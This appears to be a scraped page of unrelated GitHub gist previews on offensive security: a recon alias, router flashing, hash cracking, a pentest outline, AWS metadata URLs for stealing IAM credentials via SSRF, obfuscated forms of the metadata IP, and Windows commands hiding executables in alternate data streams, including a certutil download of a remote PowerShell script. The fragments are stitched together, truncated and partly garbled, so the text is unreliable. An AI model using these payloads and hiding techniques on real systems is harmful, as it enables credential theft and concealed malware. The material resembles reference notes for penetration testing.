xsuperbug

###
If you use kali or any distro over SSH (like Droplet or VM with no GUI), You might have noticed aquatone does require xorg. 
This few lines will help you create a report of domains with response headers and screenshots using gowitness.

Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone

> Setup Kali Linux Hyper-V  OR Ubuntu droplet
> Set VM/Droplet to Apache on boot. (Also SSH if it's VM) 
> Set VM to start on host boot

rootxharsh

alias reconme='function frecon()
{
         mkdir $1
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
         mv report.html $1/report-$1.html
         sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
         chown -R www-data:www-data /var/www/html/recon
         touch /var/www/html/recon/$1/index.html

grantstephens

Important Links:

• OpenWRT device page

Flash instruction:

The only way to flash LEDE image in TL-WR902AC v3 is to use tftp recovery mode in U-Boot:

1. Configure PC with static IP 192.168.0.66/24 and tftp server.
2. Rename "openwrt-ramips-mt76x8-tplink_tl-wr902ac-v3-squashfs-tftp-recovery.bin" to "tp_recovery.bin" and place it in tftp server directory.

jhaddix

`
~/
~
ים
   
 
___
__
_

7MinSec

Update 8/24/23:

I now do password cracking in the cloud using a suped up AWS rig. More details here.

---

This document is under construction, but is intended to get you up and running quickly with cracking hashes in the cloud using the Paperspace service.

Resources used for this article:

• https://samiux.blogspot.com/2017/12/howto-install-hashcat-on-ubuntu-16043.html

ionicpanda

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

jhaddix

Fast Testing Checklist

A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file

Contents

• Recon and analysis
• Test handling of access
• Test handling of input
• Test application logic
• Assess application hosting
• Miscellaneous tests

danielpops

$ ./try_local_metadata.sh
Trying 169.254.169.254...             found metadata
Trying 169.254.43518...               -
Trying 169.1668966...                 -
Trying 2852039166...                  found metadata
Trying 0251.0376.0251.0376...         found metadata
Trying 0251.0376.0124776...           -
Trying 251.0775248...                 -
Trying 25177524776...                 -
Trying 0xa9.0xfe.0xa9.0xfe...         found metadata

api0cradle

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab